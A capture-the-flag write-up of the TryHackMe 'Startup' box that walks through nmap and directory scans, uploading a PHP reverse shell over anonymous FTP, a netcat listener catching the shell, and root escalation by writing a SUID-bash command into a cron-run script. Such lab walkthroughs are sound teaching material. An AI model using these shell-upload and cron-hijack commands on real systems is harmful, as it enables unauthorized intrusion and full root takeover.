Startup TryHackMe Writeup
Startup is a boot2root challenge available on TryHackMe. This is an easy level box which includes compromising a web server by uploading our web shell via FTP and then exploiting a cronjob to get the root shell. Let's get started!
Challenge Link: https://tryhackme.com/room/startup
Initial Enumeration
I started the initial enumeration by running a port scan using nmap looking for open ports and default scripts.
┌──(madhav㉿kali)-[~/ctf/thm/startup]
└─$ nmap -sC -sV -oN nmap/initial 10.10.254.238
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-01 20:34 IST
Nmap scan report for 10.10.254.238
Host is up (0.16s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxrwxrwx 2 65534 65534 4096 Nov 12 2020 ftp [NSE: writeable]
| -rw-r--r-- 1 0 0 251631 Nov 12 2020 important.jpg
|_-rw-r--r-- 1 0 0 208 Nov 12 2020 notice.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.17.12.59
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b9:a6:0b:84:1d:22:01:a4:01:30:48:43:61:2b:ab:94 (RSA)
| 256 ec:13:25:8c:18:20:36:e6:ce:91:0e:16:26:eb:a2:be (ECDSA)
|_ 256 a2:ff:2a:72:81:aa:a2:9f:55:a4:dc:92:23:e6:b4:3f (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Maintenance
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.68 secondsWe have three ports open, FTP running on port 21, SSH running on port 22 and Apache web server running on port 80. We can also see that FTP has anonymous login enabled so let's enumerate it first.
┌──(madhav㉿kali)-[~/ctf/thm/startup]
└─$ ftp 10.10.254.238
Connected to 10.10.254.238.
220 (vsFTPd 3.0.3)
Name (10.10.254.238:madhav): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxrwx 2 65534 65534 4096 Nov 12 2020 ftp
-rw-r--r-- 1 0 0 251631 Nov 12 2020 important.jpg
-rw-r--r-- 1 0 0 208 Nov 12 2020 notice.txt
226 Directory send OK.I downloaded all the files from the FTP server and started enumerating them one by one.
ftp> get important.jpg
local: important.jpg remote: important.jpg
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for important.jpg (251631 bytes).
226 Transfer complete.
251631 bytes received in 2.23 secs (109.9752 kB/s)
ftp> get notice.txt
local: notice.txt remote: notice.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for notice.txt (208 bytes).
226 Transfer complete.
208 bytes received in 0.00 secs (114.5011 kB/s)
ftp> cd ftp
250 Directory successfully changed.
ftp> ls -lah
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxrwx 2 65534 65534 4096 Nov 12 2020 .
drwxr-xr-x 3 65534 65534 4096 Nov 12 2020 ..
226 Directory send OK.
ftp> exit
221 Goodbye.There is an image named important.jpg, a text file named notice.txt and there was also a ftp directory which was empty.
┌──(madhav㉿kali)-[~/ctf/thm/startup]
└─$ cat notice.txt
Whoever is leaving these damn Among Us memes in this share, it IS NOT FUNNY. People downloading documents from our website will think we are a joke! Now I dont know who it is, but Maya is looking pretty sus.
I tried extracting data from the image using exiftool and binwalk but it did not contain any useful information. So now let's start enumerating the web server running on port 80.
There was nothing interesting on the homepage, so I ran a gobuster scan to look for hidden files and directories.
┌──(madhav㉿kali)-[~/ctf/thm/startup]
└─$ gobuster dir -u http://10.10.254.238 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.254.238
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/11/01 20:37:04 Starting gobuster in directory enumeration mode
===============================================================
/files (Status: 301) [Size: 314] [--> http://10.10.254.238/files/]
/server-status (Status: 403) [Size: 278]
===============================================================
2021/11/01 21:35:26 Finished
===============================================================There is a directory named files which contains the same content as the FTP.
I went back to the FTP and checked if we had permission to upload our own files. I tested it by uploading a sample file.
┌──(madhav㉿kali)-[~/ctf/thm/startup]
└─$ ftp 10.10.254.238
Connected to 10.10.254.238.
220 (vsFTPd 3.0.3)
Name (10.10.254.238:madhav): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxrwx 2 65534 65534 4096 Nov 12 2020 ftp
-rw-r--r-- 1 0 0 251631 Nov 12 2020 important.jpg
-rw-r--r-- 1 0 0 208 Nov 12 2020 notice.txt
226 Directory send OK.
ftp> cd ftp
250 Directory successfully changed.
ftp> put sample.txt
local: sample.txt remote: sample.txt
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
5 bytes sent in 0.00 secs (46.0643 kB/s)
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rwxrwxr-x 1 112 118 5 Nov 01 15:31 sample.txt
226 Directory send OK.
ftp> exit
221 Goodbye.The file was uploaded successfully and it was also reflected on the web server. Now if we visit http://10.10.254.238/files/ftp/, there will be a file named sample.txt.
Using the same method, I uploaded a php reverse shell and executed it from the web server.
After running the php reverse shell, we will get a reverse shell back into our system.
┌──(madhav㉿kali)-[~/ctf/thm/startup]
└─$ nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.17.12.59] from (UNKNOWN) [10.10.254.238] 49696
Linux startup 4.4.0-190-generic #220-Ubuntu SMP Fri Aug 28 23:02:15 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
16:31:01 up 1:27, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$User Shell
I upgraded the reverse shell into a fully interactive TTY using the following commands. This will allow us to use tab completion and the clear command.
python3 -c 'import pty;pty.spawn("/bin/bash")'
Ctrl-Z
stty raw -echo && fg
reset
export TERM=xterm
stty rows 48 columns 179Next, I checked the home directory and there was a user named lennie but we do not have access to its home directory.
www-data@startup:/$ ls -lah /home
total 12K
drwxr-xr-x 3 root root 4.0K Nov 12 2020 .
drwxr-xr-x 25 root root 4.0K Nov 1 15:04 ..
drwx------ 4 lennie lennie 4.0K Nov 12 2020 lennieNext I checked the root directory and in there, we have a folder named /incidents and a file named recipe.txt.
www-data@startup:/$ ls
bin dev home initrd.img lib lost+found mnt proc root sbin srv tmp vagrant vmlinuz
boot etc incidents initrd.img.old lib64 media opt recipe.txt run snap sys usr var vmlinuz.oldInside the incidents directory, we have a file named suspicious.pcapng. I downloaded this file on my computer and opened it with wireshark.
After opening, I went to the TCP packets and then right click on the packet > Follow > TCP Stream.
Inside this there were shell commands that the user tried to run on the system and when you scroll down, you'll find the password for user lennie.
Now we can login as user lennie via SSH and read our user flag.
┌──(madhav㉿kali)-[~/ctf/thm/startup]
└─$ ssh lennie@10.10.254.238
The authenticity of host '10.10.254.238 (10.10.254.238)' can't be established.
ECDSA key fingerprint is SHA256:xXyVGVy1l27TVcjIQj2kgTTmLYN6WCB93YJB3mAHLkA.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.254.238' (ECDSA) to the list of known hosts.
lennie@10.10.254.238's password:
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.4.0-190-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
44 packages can be updated.
30 updates are security updates.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
$ bash
lennie@startup:~$ ls
Documents scripts user.txt
lennie@startup:~$ wc -c user.txt
38 user.txt
lennie@startup:~$Root Shell
Now that we have a shell as user lennie, our next step would be to get a root shell on the box. I ran sudo -l command to see if user lennie can run any command as root and also checked if there were any interesting SUID files but there was no luck.
Next I uploaded pspy and found that /home/lennie/scripts/planner.sh is being executed as user root after every minute by a cronjob.
Now I checked the scripts/planner.sh present in the home directory of user lennie.
lennie@startup:~/scripts$ cat planner.sh
#!/bin/bash
echo $LIST > /home/lennie/scripts/startup_list.txt
/etc/print.shWe do not have writable permission for the file but we can see the file is executing another script named /etc/print.sh. I checked the permission for this file and yes, we have the permissions to modify the file.
lennie@startup:~/scripts$ ls -lah /etc/print.sh
-rwx------ 1 lennie lennie 25 Nov 12 2020 /etc/print.shSo I ran the following command to modify /etc/print.sh.
lennie@startup:~/scripts$ echo "cp /bin/bash /tmp && chmod +s /tmp/bash" > /etc/print.shWhen the script will be executed, it will copy the /bin/bash to /tmp directory and make it a SUID.
lennie@startup:~/scripts$ ls -l /tmp
total 1016
-rwsr-sr-x 1 root root 1037528 Nov 1 17:40 bashWe can see that this file has special permissions! Now we can get a root shell by running the /tmp/bash -p command. Once we are root, we can read our root flag present in the /root directory!
lennie@startup:~/scripts$ /tmp/bash -p
bash-4.3# id
uid=1002(lennie) gid=1002(lennie) euid=0(root) egid=0(root) groups=0(root),1002(lennie)
bash-4.3# cd /root
bash-4.3# wc -c root.txt
38 root.txtThat’s it! Thanks for reading. Stay tuned for similar walkthroughs and much more coming up in the near future!
NOTE: The awesome artwork used in this article was created by Fábio Lobo.